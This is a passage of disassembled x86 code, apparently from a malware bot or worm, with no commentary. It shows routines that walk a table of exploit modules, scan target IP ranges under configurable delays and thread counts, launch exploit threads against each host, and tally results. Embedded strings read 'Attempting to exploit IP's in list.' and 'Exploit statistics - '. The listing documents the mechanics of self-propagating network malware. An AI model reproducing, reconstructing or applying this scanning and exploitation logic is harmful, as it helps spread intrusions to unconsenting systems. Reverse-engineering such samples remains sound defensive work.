loc_413381: ; CODE XREF: sub_41331E+4E�j
cmp [ebp+var_112], 0
jz short loc_4133B1
push [ebp+var_10E]
call sub_41308F
pop ecx
cmp [ebp+var_112], eax
jz short loc_4133B1
push [ebp+var_10E]
call sub_4053B1
pop ecx
xor eax, eax
jmp locret_413498
; ---------------------------------------------------------------------------
loc_4133B1: ; CODE XREF: sub_41331E+6A�j
; sub_41331E+7E�j
cmp [ebp+var_8A], 1
jnz short loc_4133E0
lea eax, [ebp+var_6]
push eax
push [ebp+var_10E]
call sub_404552
pop ecx
pop ecx
push offset dword_41EFD8
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_413444
; ---------------------------------------------------------------------------
loc_4133E0: ; CODE XREF: sub_41331E+9A�j
cmp [ebp+var_8A], 2
jnz short loc_413420
push 0Ah
lea eax, [ebp+var_6]
push eax
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp+var_10A]
push eax
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_413444
; ---------------------------------------------------------------------------
loc_413420: ; CODE XREF: sub_41331E+C9�j
call sub_412D4C
push eax
lea eax, [ebp+var_6]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41EFD8
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_413444: ; CODE XREF: sub_41331E+C0�j
; sub_41331E+100�j
lea eax, [ebp+var_14C]
push eax
call [ebp+var_11A]
cmp [ebp+var_8A], 1
jnz short loc_41346F
push [ebp+var_10E]
push [ebp+var_14C]
call sub_412A3A
pop ecx
pop ecx
jmp short loc_41348A
; ---------------------------------------------------------------------------
loc_41346F: ; CODE XREF: sub_41331E+13A�j
cmp [ebp+var_8A], 2
jnz short loc_41348A
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_86]
push eax
call sub_412BC9
pop ecx
pop ecx
loc_41348A: ; CODE XREF: sub_41331E+14F�j
; sub_41331E+158�j
push [ebp+var_10E]
call sub_4053B1
pop ecx
xor eax, eax
locret_413498: ; CODE XREF: sub_41331E+5E�j
; sub_41331E+8E�j
leave
retn 4
sub_41331E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41349C proc near ; DATA XREF: sub_413AB0+1F4�o
var_774 = qword ptr -774h
var_764 = qword ptr -764h
var_75C = byte ptr -75Ch
var_65C = byte ptr -65Ch
var_658 = dword ptr -658h
var_654 = dword ptr -654h
var_650 = dword ptr -650h
var_64C = byte ptr -64Ch
var_648 = byte ptr -648h
var_644 = dword ptr -644h
var_640 = byte ptr -640h
var_62C = dword ptr -62Ch
var_628 = dword ptr -628h
var_624 = byte ptr -624h
var_51C = byte ptr -51Ch
var_50E = dword ptr -50Eh
var_50A = dword ptr -50Ah
var_506 = dword ptr -506h
var_502 = byte ptr -502h
var_37B = byte ptr -37Bh
var_37A = byte ptr -37Ah
var_377 = byte ptr -377h
var_36B = byte ptr -36Bh
var_36A = byte ptr -36Ah
var_35C = dword ptr -35Ch
var_358 = dword ptr -358h
var_354 = byte ptr -354h
var_341 = byte ptr -341h
var_296 = dword ptr -296h
var_20C = byte ptr -20Ch
var_20B = byte ptr -20Bh
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 764h
push edi
push 2C9h
push [ebp+arg_0]
lea eax, [ebp+var_628]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_51C]
push eax
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_4134F5
push 14Ch
push 0
lea eax, [ebp+var_358]
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp loc_4135BF
; ---------------------------------------------------------------------------
loc_4134F5: ; CODE XREF: sub_41349C+3C�j
and [ebp+var_62C], 0
jmp short loc_41350B
; ---------------------------------------------------------------------------
loc_4134FE: ; CODE XREF: sub_41349C:loc_4135BA�j
mov eax, [ebp+var_62C]
inc eax
mov [ebp+var_62C], eax
loc_41350B: ; CODE XREF: sub_41349C+60�j
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CD40
push eax
lea eax, [ebp+var_640]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_640]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_640]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_4135BA
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CD40
mov [ebp+var_358], eax
push 3Ah
mov eax, [ebp+var_62C]
imul eax, 3Ah
add eax, offset byte_41CD40
push eax
lea eax, [ebp+var_354]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_354]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_341]
push eax
call sub_4105FB
pop ecx
and [ebp+var_296], 0
lea eax, [ebp+var_341]
push eax
lea eax, [ebp+var_51C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_4135BF
; ---------------------------------------------------------------------------
loc_4135BA: ; CODE XREF: sub_41349C+B0�j
jmp loc_4134FE
; ---------------------------------------------------------------------------
loc_4135BF: ; CODE XREF: sub_41349C+54�j
; sub_41349C+11C�j
lea eax, [ebp+var_624]
push eax
call sub_40806A
pop ecx
test eax, eax
jnz short loc_4135E3
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_4135E3: ; CODE XREF: sub_41349C+132�j
mov al, byte_41DEC0
mov [ebp+var_20C], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_20B]
rep stosd
stosw
stosb
mov al, byte_41DEC0
mov [ebp+var_108], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_107]
rep stosd
stosw
stosb
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_624]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_407F3D
add esp, 0Ch
test eax, eax
jnz short loc_41364D
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_41364D: ; CODE XREF: sub_41349C+19C�j
push [ebp+var_506]
call sub_404D10
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413675
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
jmp loc_413AAB
; ---------------------------------------------------------------------------
loc_413675: ; CODE XREF: sub_41349C+1C4�j
cmp [ebp+var_358], 0
jz loc_413782
mov eax, [ebp+var_358]
mov eax, [eax+32h]
and eax, 1
test eax, eax
jz loc_413782
call sub_4042FB
mov [ebp+var_644], eax
cmp [ebp+var_644], 0
jz short loc_4136B6
mov [ebp+var_296], 2
jmp short loc_4136C0
; ---------------------------------------------------------------------------
loc_4136B6: ; CODE XREF: sub_41349C+20C�j
mov [ebp+var_296], 3
loc_4136C0: ; CODE XREF: sub_41349C+218�j
movsx eax, [ebp+var_36B]
test eax, eax
jz short loc_4136E5
mov eax, [ebp+var_358]
mov eax, [eax+32h]
and eax, 2
test eax, eax
jnz short loc_4136E5
mov [ebp+var_296], 1
loc_4136E5: ; CODE XREF: sub_41349C+22D�j
; sub_41349C+23D�j
movsx eax, [ebp+var_37B]
test eax, eax
jz short loc_4136FA
mov [ebp+var_296], 2
loc_4136FA: ; CODE XREF: sub_41349C+252�j
movsx eax, [ebp+var_37A]
test eax, eax
jz short loc_41370F
mov [ebp+var_296], 3
loc_41370F: ; CODE XREF: sub_41349C+267�j
cmp [ebp+var_296], 3
jnz short loc_41372B
cmp [ebp+var_644], 0
jz short loc_41372B
mov [ebp+var_296], 2
loc_41372B: ; CODE XREF: sub_41349C+27A�j
; sub_41349C+283�j
cmp [ebp+var_296], 3
jnz short loc_413782
mov al, [ebp+var_36A]
mov [ebp+var_64C], al
mov al, [ebp+var_377]
mov [ebp+var_648], al
mov [ebp+var_36A], 1
and [ebp+var_377], 0
push 0
lea eax, [ebp+var_502]
push eax
call sub_412F07
pop ecx
pop ecx
mov al, [ebp+var_64C]
mov [ebp+var_36A], al
mov al, [ebp+var_648]
mov [ebp+var_377], al
loc_413782: ; CODE XREF: sub_41349C+1E0�j
; sub_41349C+1F4�j ...
push offset dword_41E368
call sub_409C6C
pop ecx
push [ebp+var_50E]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
push offset dword_41CEE8
mov eax, [ebp+var_628]
add eax, 14h
push eax
call sub_416B5E ; sprintf
add esp, 14h
push offset dword_41E368
call sub_409C7A
pop ecx
push [ebp+var_50E]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
mov eax, [ebp+var_628]
push dword ptr [eax]
push offset dword_41CEB0
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 18h
cmp [ebp+var_358], 0
jnz short loc_413807
push 3E8h
call dword_41709C ; Sleep
loc_413807: ; CODE XREF: sub_41349C+35E�j
and [ebp+var_10C], 0
call sub_416B64 ; clock
mov [ebp+var_35C], eax
and [ebp+var_4], 0
loc_41381D: ; CODE XREF: sub_41349C+3F9�j
; sub_41349C+44B�j ...
mov eax, [ebp+var_628]
cmp dword ptr [eax+4], 0
jnz short loc_413847
call sub_416B64 ; clock
add eax, [ebp+var_4]
sub eax, [ebp+var_35C]
mov ecx, [ebp+var_50E]
imul ecx, 3E8h
cmp eax, ecx
jb short loc_41384C
loc_413847: ; CODE XREF: sub_41349C+38B�j
jmp loc_413A43
; ---------------------------------------------------------------------------
loc_41384C: ; CODE XREF: sub_41349C+3A9�j
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_624]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_407F3D
add esp, 0Ch
push offset dword_41EFD8
lea eax, [ebp+var_20C]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_413897
jmp short loc_41381D
; ---------------------------------------------------------------------------
loc_413897: ; CODE XREF: sub_41349C+3F7�j
push [ebp+var_8]
push 0
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_404FE7
add esp, 0Ch
push eax
call sub_404D4D
pop ecx
pop ecx
mov [ebp+var_650], eax
cmp [ebp+var_650], 0
jz short loc_4138EC
call sub_416B64 ; clock
add eax, [ebp+var_4]
sub eax, [ebp+var_35C]
mov ecx, [ebp+var_50E]
imul ecx, 3E8h
cmp eax, ecx
jnb short loc_4138EC
jmp loc_41381D
; ---------------------------------------------------------------------------
loc_4138EC: ; CODE XREF: sub_41349C+42B�j
; sub_41349C+449�j
push [ebp+var_50A]
call dword_41709C ; Sleep
push [ebp+var_8]
call sub_404E1C
pop ecx
test eax, eax
jz loc_413A35
loc_413909: ; CODE XREF: sub_41349C+4BA�j
; sub_41349C:loc_413A30�j
push [ebp+var_8]
call sub_404F24
pop ecx
mov [ebp+var_654], eax
cmp [ebp+var_654], 0
jnz short loc_413926
jmp loc_413A35
; ---------------------------------------------------------------------------
loc_413926: ; CODE XREF: sub_41349C+483�j
mov eax, [ebp+var_10C]
inc eax
mov [ebp+var_10C], eax
cmp [ebp+var_358], 0
jz short loc_4139B7
push 14Ch
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_658], eax
cmp [ebp+var_658], 0
jnz short loc_413958
jmp short loc_413909
; ---------------------------------------------------------------------------
loc_413958: ; CODE XREF: sub_41349C+4B8�j
push 14Ch
lea eax, [ebp+var_358]
push eax
push [ebp+var_658]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_658]
mov ecx, [ebp+var_654]
mov [eax+3Eh], ecx
push [ebp+var_658]
push offset sub_41331E
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_4139A5
push [ebp+var_658]
call sub_416B4C ; free
pop ecx
jmp short loc_4139B5
; ---------------------------------------------------------------------------
loc_4139A5: ; CODE XREF: sub_41349C+4F9�j
push [ebp+var_8]
push [ebp+var_654]
call sub_404D9B
pop ecx
pop ecx
loc_4139B5: ; CODE XREF: sub_41349C+507�j
jmp short loc_413A30
; ---------------------------------------------------------------------------
loc_4139B7: ; CODE XREF: sub_41349C+49E�j
mov eax, [ebp+var_628]
cmp dword ptr [eax+4], 0
jz short loc_4139C5
jmp short loc_413A35
; ---------------------------------------------------------------------------
loc_4139C5: ; CODE XREF: sub_41349C+525�j
lea eax, [ebp+var_75C]
push eax
push [ebp+var_654]
call sub_4044F7
pop ecx
pop ecx
mov al, [ebp+var_36A]
mov [ebp+var_65C], al
and [ebp+var_36A], 0
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_75C]
push eax
push offset dword_41CE9C
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 10h
mov al, [ebp+var_65C]
mov [ebp+var_36A], al
push 3E8h
call dword_41709C ; Sleep
mov eax, [ebp+var_4]
add eax, 3E8h
mov [ebp+var_4], eax
loc_413A30: ; CODE XREF: sub_41349C:loc_4139B5�j
jmp loc_413909
; ---------------------------------------------------------------------------
loc_413A35: ; CODE XREF: sub_41349C+467�j
; sub_41349C+485�j ...
push [ebp+var_8]
call sub_404F7D
pop ecx
jmp loc_41381D
; ---------------------------------------------------------------------------
loc_413A43: ; CODE XREF: sub_41349C:loc_413847�j
push [ebp+var_10C]
call sub_416B64 ; clock
sub eax, [ebp+var_35C]
mov dword ptr [ebp+var_764], eax
and dword ptr [ebp+var_764+4], 0
fild [ebp+var_764]
fdiv flt_417270
push ecx
push ecx
fstp [esp+774h+var_774]
lea eax, [ebp+var_51C]
push eax
lea eax, [ebp+var_624]
push eax
push offset unk_41CE58
lea eax, [ebp+var_502]
push eax
call sub_40D53F
add esp, 1Ch
push [ebp+var_8]
call sub_404FD0
pop ecx
push [ebp+var_628]
call sub_409763
pop ecx
xor eax, eax
loc_413AAB: ; CODE XREF: sub_41349C+142�j
; sub_41349C+1AC�j ...
pop edi
leave
retn 4
sub_41349C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413AB0 proc near ; CODE XREF: sub_40A9CF+BCB�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 34h
cmp [ebp+arg_4], 0
jz short loc_413AC2
cmp [ebp+arg_8], 0
jnz short loc_413AC7
loc_413AC2: ; CODE XREF: sub_413AB0+A�j
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413AC7: ; CODE XREF: sub_413AB0+10�j
push [ebp+arg_8]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_413AEB
push [ebp+arg_8]
call sub_40422A
pop ecx
test eax, eax
jnz short loc_413AE9
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413AE9: ; CODE XREF: sub_413AB0+32�j
jmp short loc_413B45
; ---------------------------------------------------------------------------
loc_413AEB: ; CODE XREF: sub_413AB0+25�j
and [ebp+var_14], 0
jmp short loc_413AF8
; ---------------------------------------------------------------------------
loc_413AF1: ; CODE XREF: sub_413AB0:loc_413B43�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_413AF8: ; CODE XREF: sub_413AB0+3F�j
mov eax, [ebp+var_14]
imul eax, 3Ah
movsx eax, byte_41CD40[eax]
test eax, eax
jnz short loc_413B0E
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413B0E: ; CODE XREF: sub_413AB0+57�j
mov eax, [ebp+var_14]
imul eax, 3Ah
add eax, offset byte_41CD40
push eax
lea eax, [ebp+var_28]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_28]
push eax
call sub_4105FB
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_28]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_413B43
jmp short loc_413B45
; ---------------------------------------------------------------------------
loc_413B43: ; CODE XREF: sub_413AB0+8F�j
jmp short loc_413AF1
; ---------------------------------------------------------------------------
loc_413B45: ; CODE XREF: sub_413AB0:loc_413AE9�j
; sub_413AB0+91�j
cmp [ebp+arg_C], 0
jz short loc_413B59
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_2C], eax
jmp short loc_413B60
; ---------------------------------------------------------------------------
loc_413B59: ; CODE XREF: sub_413AB0+99�j
mov [ebp+var_2C], 15180h
loc_413B60: ; CODE XREF: sub_413AB0+A7�j
mov eax, [ebp+var_2C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_413B75
cmp [ebp+var_4], 15180h
jbe short loc_413B7C
loc_413B75: ; CODE XREF: sub_413AB0+BA�j
mov [ebp+var_4], 15180h
loc_413B7C: ; CODE XREF: sub_413AB0+C3�j
cmp [ebp+arg_10], 0
jz short loc_413B90
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_30], eax
jmp short loc_413B97
; ---------------------------------------------------------------------------
loc_413B90: ; CODE XREF: sub_413AB0+D0�j
mov [ebp+var_30], 7D0h
loc_413B97: ; CODE XREF: sub_413AB0+DE�j
mov eax, [ebp+var_30]
mov [ebp+var_C], eax
cmp [ebp+var_C], 32h
jb short loc_413BAC
cmp [ebp+var_C], 0EA60h
jbe short loc_413BB3
loc_413BAC: ; CODE XREF: sub_413AB0+F1�j
mov [ebp+var_C], 7D0h
loc_413BB3: ; CODE XREF: sub_413AB0+FA�j
cmp [ebp+arg_14], 0
jz short loc_413BC7
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_34], eax
jmp short loc_413BCE
; ---------------------------------------------------------------------------
loc_413BC7: ; CODE XREF: sub_413AB0+107�j
mov [ebp+var_34], 100h
loc_413BCE: ; CODE XREF: sub_413AB0+115�j
mov eax, [ebp+var_34]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_413BE3
cmp [ebp+var_10], 200h
jbe short loc_413BEA
loc_413BE3: ; CODE XREF: sub_413AB0+128�j
mov [ebp+var_10], 100h
loc_413BEA: ; CODE XREF: sub_413AB0+131�j
push 2C9h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413C03
jmp locret_413CB1
; ---------------------------------------------------------------------------
loc_413C03: ; CODE XREF: sub_413AB0+14C�j
push 108h
push [ebp+arg_4]
mov eax, [ebp+var_8]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 0Eh
push [ebp+arg_8]
mov eax, [ebp+var_8]
add eax, 10Ch
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
mov [eax+11Ah], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov [eax+11Eh], ecx
mov eax, [ebp+var_8]
mov ecx, [ebp+var_10]
mov [eax+122h], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_8]
add eax, 126h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_10]
push [ebp+var_C]
mov eax, [ebp+var_8]
push dword ptr [eax+11Ah]
mov eax, [ebp+var_8]
add eax, 10Ch
push eax
mov eax, [ebp+var_8]
add eax, 4
push eax
push offset unk_41CF14
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_8]
push offset sub_41349C
call sub_4095A4
add esp, 24h
locret_413CB1: ; CODE XREF: sub_413AB0:loc_413AC2�j
; sub_413AB0+34�j ...
leave
retn
sub_413AB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413CB3 proc near ; DATA XREF: sub_413FE7+5C�o
var_49C = dword ptr -49Ch
var_498 = byte ptr -498h
var_494 = byte ptr -494h
var_490 = dword ptr -490h
var_48C = dword ptr -48Ch
var_488 = dword ptr -488h
var_484 = dword ptr -484h
var_480 = dword ptr -480h
var_47C = byte ptr -47Ch
var_469 = byte ptr -469h
var_3BE = dword ptr -3BEh
var_334 = dword ptr -334h
var_330 = dword ptr -330h
var_32C = byte ptr -32Ch
var_1AC = byte ptr -1ACh
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_21 = byte ptr -21h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
push 327h
push [ebp+arg_0]
lea eax, [ebp+var_330]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov eax, [ebp+var_330]
push dword ptr [eax]
push offset unk_41CFC0
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 0Ch
and [ebp+var_334], 0
and [ebp+var_484], 0
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
lea eax, [ebp+var_32C]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_8], eax
loc_413D21: ; CODE XREF: sub_413CB3:loc_413FA8�j
mov eax, [ebp+var_334]
inc eax
mov [ebp+var_334], eax
and [ebp+var_488], 0
jmp short loc_413D44
; ---------------------------------------------------------------------------
loc_413D37: ; CODE XREF: sub_413CB3+23B�j
; sub_413CB3:loc_413F77�j
mov eax, [ebp+var_488]
inc eax
mov [ebp+var_488], eax
loc_413D44: ; CODE XREF: sub_413CB3+82�j
mov eax, [ebp+var_488]
imul eax, 3Ah
cmp off_41CD6E[eax], 0
jz loc_413F7C
push 3Ah
mov eax, [ebp+var_488]
imul eax, 3Ah
add eax, offset byte_41CD40
push eax
lea eax, [ebp+var_47C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_488]
imul eax, 3Ah
add eax, offset byte_41CD40
mov [ebp+var_480], eax
lea eax, [ebp+var_47C]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_469]
push eax
call sub_4105FB
pop ecx
cmp [ebp+var_480], 0
jz loc_413E9A
mov eax, [ebp+var_480]
mov eax, [eax+32h]
and eax, 1
test eax, eax
jz loc_413E9A
call sub_4042FB
mov [ebp+var_490], eax
cmp [ebp+var_490], 0
jz short loc_413DE9
mov [ebp+var_3BE], 2
jmp short loc_413DF3
; ---------------------------------------------------------------------------
loc_413DE9: ; CODE XREF: sub_413CB3+128�j
mov [ebp+var_3BE], 3
loc_413DF3: ; CODE XREF: sub_413CB3+134�j
movsx eax, [ebp+var_15]
test eax, eax
jz short loc_413E15
mov eax, [ebp+var_480]
mov eax, [eax+32h]
and eax, 2
test eax, eax
jnz short loc_413E15
mov [ebp+var_3BE], 1
loc_413E15: ; CODE XREF: sub_413CB3+146�j
; sub_413CB3+156�j
movsx eax, [ebp+var_25]
test eax, eax
jz short loc_413E27
mov [ebp+var_3BE], 2
loc_413E27: ; CODE XREF: sub_413CB3+168�j
movsx eax, [ebp+var_24]
test eax, eax
jz short loc_413E39
mov [ebp+var_3BE], 3
loc_413E39: ; CODE XREF: sub_413CB3+17A�j
cmp [ebp+var_3BE], 3
jnz short loc_413E55
cmp [ebp+var_490], 0
jz short loc_413E55
mov [ebp+var_3BE], 2
loc_413E55: ; CODE XREF: sub_413CB3+18D�j
; sub_413CB3+196�j
cmp [ebp+var_3BE], 3
jnz short loc_413E9A
mov al, [ebp+var_14]
mov [ebp+var_498], al
mov al, [ebp+var_21]
mov [ebp+var_494], al
mov [ebp+var_14], 1
and [ebp+var_21], 0
push 0
lea eax, [ebp+var_1AC]
push eax
call sub_412F07
pop ecx
pop ecx
mov al, [ebp+var_498]
mov [ebp+var_14], al
mov al, [ebp+var_494]
mov [ebp+var_21], al
loc_413E9A: ; CODE XREF: sub_413CB3+FC�j
; sub_413CB3+110�j ...
movsx eax, [ebp+var_13]
neg eax
sbb eax, eax
and eax, 1388h
add eax, 1388h
push eax
push 0
lea eax, [ebp+var_469]
push eax
push [ebp+var_8]
call sub_4050EA
add esp, 10h
mov [ebp+var_48C], eax
cmp [ebp+var_48C], 0
jz loc_413F77
push 14Ch
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_49C], eax
cmp [ebp+var_49C], 0
jnz short loc_413EF3
jmp loc_413D37
; ---------------------------------------------------------------------------
loc_413EF3: ; CODE XREF: sub_413CB3+239�j
push 14Ch
lea eax, [ebp+var_480]
push eax
push [ebp+var_49C]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_484]
inc eax
mov [ebp+var_484], eax
mov eax, [ebp+var_49C]
mov ecx, [ebp+var_48C]
mov [eax+3Eh], ecx
push [ebp+var_49C]
push offset sub_41331E
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_413F59
push [ebp+var_48C]
call sub_4053B1
pop ecx
push [ebp+var_49C]
call sub_416B4C ; free
pop ecx
jmp short loc_413F77
; ---------------------------------------------------------------------------
loc_413F59: ; CODE XREF: sub_413CB3+28A�j
lea eax, [ebp+var_47C]
push eax
push [ebp+var_8]
push offset dword_41CF90
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 10h
loc_413F77: ; CODE XREF: sub_413CB3+21B�j
; sub_413CB3+2A4�j
jmp loc_413D37
; ---------------------------------------------------------------------------
loc_413F7C: ; CODE XREF: sub_413CB3+A1�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_413F9A
jmp short loc_413FAD
; ---------------------------------------------------------------------------
loc_413F9A: ; CODE XREF: sub_413CB3+2E3�j
mov eax, [ebp+var_330]
cmp dword ptr [eax+4], 0
jz short loc_413FA8
jmp short loc_413FAD
; ---------------------------------------------------------------------------
loc_413FA8: ; CODE XREF: sub_413CB3+2F1�j
jmp loc_413D21
; ---------------------------------------------------------------------------
loc_413FAD: ; CODE XREF: sub_413CB3+2E5�j
; sub_413CB3+2F3�j
push [ebp+var_334]
push [ebp+var_484]
mov eax, [ebp+var_330]
push dword ptr [eax]
push offset dword_41CF4C
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 14h
push [ebp+var_330]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_413CB3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413FE7 proc near ; CODE XREF: sub_40A9CF+B5B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_413FF3
jmp short locret_414050
; ---------------------------------------------------------------------------
loc_413FF3: ; CODE XREF: sub_413FE7+8�j
push 327h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414009
jmp short locret_414050
; ---------------------------------------------------------------------------
loc_414009: ; CODE XREF: sub_413FE7+1E�j
push 180h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 184h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push offset aAttemptingToEx ; "Attempting to exploit IP's in list."
push 0
push [ebp+var_4]
push offset sub_413CB3
call sub_4095A4
add esp, 10h
locret_414050: ; CODE XREF: sub_413FE7+A�j
; sub_413FE7+20�j
leave
retn
sub_413FE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414052 proc near ; DATA XREF: sub_41417D+35�o
var_3C0 = dword ptr -3C0h
var_3BC = byte ptr -3BCh
var_225 = byte ptr -225h
var_224 = byte ptr -224h
var_218 = byte ptr -218h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3C0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_3C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push offset aExploitStatist ; "Exploit statistics - "
lea eax, [ebp+var_200]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
and [ebp+var_204], 0
jmp short loc_4140A4
; ---------------------------------------------------------------------------
loc_414097: ; CODE XREF: sub_414052:loc_41414A�j
mov eax, [ebp+var_204]
inc eax
mov [ebp+var_204], eax
loc_4140A4: ; CODE XREF: sub_414052+43�j
mov eax, [ebp+var_204]
imul eax, 3Ah
movsx eax, byte_41CD40[eax]
test eax, eax
jz loc_41414F
push 12h
mov eax, [ebp+var_204]
imul eax, 3Ah
add eax, offset byte_41CD40
push eax
lea eax, [ebp+var_218]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_218]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_218]
push eax
lea eax, [ebp+var_200]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_204]
imul eax, 3Ah
